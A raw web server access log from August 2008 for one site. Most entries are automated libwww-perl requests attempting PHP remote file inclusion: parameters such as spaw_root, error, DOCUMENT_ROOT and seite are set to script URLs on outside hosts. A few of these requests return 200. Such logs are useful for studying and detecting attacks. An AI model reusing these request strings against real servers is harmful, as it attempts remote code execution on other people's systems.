88.168.106.155 - - [07/Aug/2008:12:26:40 -0700] "GET /logs/access_080226.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:27:04 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:27:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:12:27:08 -0700] "GET /logs/info/PhpLinkExchange/bits_listings.php?svr_rootP=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:12:27:08 -0700] "GET /info/PhpLinkExchange/bits_listings.php?svr_rootP=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:30 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:30 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:31 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:31 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:32 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:27:34 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:27:34 -0700] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:42 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:27:43 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:27:43 -0700] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:27:46 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:28:04 -0700] "GET /logs/access_080105.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:28:22 -0700] "GET /logs/access_080102.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:28:53 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:28:53 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:28:54 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:29:08 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:29:08 -0700] "GET /logs/access_080117.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:29:08 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:29:09 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:29:10 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:29:10 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:29:14 -0700] "GET /logs/access_080215.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:29:35 -0700] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:29:40 -0700] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:29:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:29:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:29:46 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:29:49 -0700] "GET /logs/access_080210.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:12:29:53 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:12:29:53 -0700] "GET /logs/access_080117.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:29:53 -0700] "GET /logs/access_071221.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:12:29:53 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:29:59 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:30:04 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:30:04 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:12:30:12 -0700] "GET /logs/access_080215.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:30:40 -0700] "GET /logs/access_080210.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.60.16.70 - - [07/Aug/2008:12:30:42 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:30:53 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:30:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:30:54 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:30:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:31:08 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:31:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:31:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:31:10 -0700] "GET /logs/access_080227.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:31:10 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:31:10 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.64.84.99 - - [07/Aug/2008:12:31:21 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:31:25 -0700] "GET /view.php?sub=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:31:26 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:31:44 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:31:44 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:32:04 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:07 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:12 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:16 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:18 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.67.67.227 - - [07/Aug/2008:12:32:21 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:21 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:32:26 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:32:27 -0700] "GET //index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:32:30 -0700] "GET //index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:32:39 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:32:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:32:45 -0700] "GET /logs/access_080116.log//index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:32:47 -0700] "GET //index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.810" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:32:52 -0700] "GET //index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.79" "www.dmulk.com"
210.240.235.234 - - [07/Aug/2008:12:32:58 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:33:00 -0700] "GET /logs/access_080124.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.236.157.231 - - [07/Aug/2008:12:33:17 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:33:27 -0700] "GET /logs/access_080306.log///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:33:39 -0700] "GET /logs/access_080117.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:33:39 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:33:39 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.42.140.72 - - [07/Aug/2008:12:33:40 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 397312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
98.240.225.171 - - [07/Aug/2008:12:33:41 -0700] "GET / HTTP/1.1" 200 18257 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:33:51 -0700] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:53 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:56 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:56 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:57 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:58 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:58 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:58 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:59 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:12:33:59 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:34:16 -0700] "GET /logs/access_080215.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:34:19 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:34:19 -0700] "GET /logs/access_080117.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:34:19 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.255.255.54 - - [07/Aug/2008:12:34:25 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:34:29 -0700] "GET /logs/access_080215.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.105.211.65 - - [07/Aug/2008:12:34:55 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:35:01 -0700] "GET /logs/access_080117.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:35:01 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:35:01 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:35:02 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:35:02 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:35:02 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:35:03 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:35:08 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:35:08 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:35:08 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:35:40 -0700] "GET /logs/access_080215.log//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:35:48 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:35:48 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:35:51 -0700] "GET /logs//login.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:35:52 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:35:53 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:35:56 -0700] "GET //login.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:36:17 -0700] "GET /logs/access_080404.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:36:18 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
